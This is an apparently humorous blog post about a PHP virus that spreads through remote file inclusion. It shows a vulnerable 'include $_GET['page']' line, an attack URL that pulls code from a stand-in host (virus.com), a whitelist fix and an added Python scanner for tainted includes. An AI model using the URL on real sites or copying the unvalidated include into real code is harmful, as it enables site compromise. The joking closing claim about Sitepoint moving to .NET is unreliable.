By Harry Fuecks

PHP Virus Attacking Web Hosts


Symantec have a report of the virus here.

I’ve yet to see any of the PHP news sites picking up on it but, using a virtual host account, managed to deliberately expose some PHP scripts to it.

From examining the infected scripts, what’s disturbing is that, once a script is infected, every time it is executed the virus goes on a hunt for other web sites using PHP to see if it can trick them into executing the virus, thereby spreading it further directly over the Internet. Although the spread is likely to be slow, it can take place automatically, without your intervention!

If your site contains code like;


// index.php
include $_GET['page'];

You need to take action now – your site could be infected with a URL like;


http://yoursite.com/index.php?page=http://virus.com/virus.php

A simple way to validate is;


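// Only these page names may be included
$pages = array('news','articles','blog');
if ( isset($_GET['page']) && in_array($_GET['page'], $pages, true) ) {
    // The value matched the whitelist, so it is safe to build the path from it
    include $_GET['page'] . '.php';
} else {
    // Anything else, including a remote URL, falls back to the home page
    include 'home.php';
}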
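
To check a whole code base for includes like the one above, here is an added example (not from the original article) that flags `include`/`require` statements whose path is built from request data. It goes beyond the `$_GET` case in the text by also covering `$_POST`, `$_REQUEST`, `$_COOKIE` and variables assigned directly from them; the names `find_tainted_includes` and `SAMPLE` are hypothetical.

```python
import re

# Request superglobals an attacker controls directly.
TAINTED = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
# include/require (and the *_once forms) up to the terminating semicolon.
INCLUDE_STMT = re.compile(
    r"(?<![\w$>])(?:include|require)(?:_once)?\b\s*\(?(?P<arg>[^;]*);", re.I)
# Simple assignment: $name = expression;
ASSIGN = re.compile(r"(\$\w+)\s*=(?!=)\s*([^;]*);")


def strip_comments(src):
    """Blank out PHP comments while keeping line numbers stable."""
    src = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"),
                 src, flags=re.S)
    return re.sub(r"(?m)^[ \t]*(?://|#).*$", "", src)


def find_tainted_includes(php_source):
    """Return [(line, statement)] for includes whose path uses request data."""
    # Guards such as in_array() are not analysed, so every hit is a
    # candidate for manual review rather than a confirmed flaw.
    src = strip_comments(php_source)
    # One level of taint tracking: variables assigned from a superglobal.
    tainted_vars = {name for name, value in ASSIGN.findall(src)
                    if TAINTED.search(value)}
    findings = []
    for m in INCLUDE_STMT.finditer(src):
        arg = m.group("arg")
        via_var = any(re.search(re.escape(v) + r"\b", arg)
                      for v in tainted_vars)
        if TAINTED.search(arg) or via_var:
            line = src.count("\n", 0, m.start()) + 1
            findings.append((line, m.group(0).strip()))
    return findings


# Constructed sample input, not taken from a real site.
SAMPLE = """<?php
// include $_GET['ignored'];
include 'header.php';
include $_GET['page'];
$tpl = $_REQUEST['tpl'];
require_once($tpl . '.php');
"""
```

Running `find_tainted_includes` over each `.php` file gives a review list; an include that already sits behind a whitelist check will still appear in it and can be ticked off by hand.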

Sitepoint have taken the extreme but necessary approach of upgrading to .NET in response.
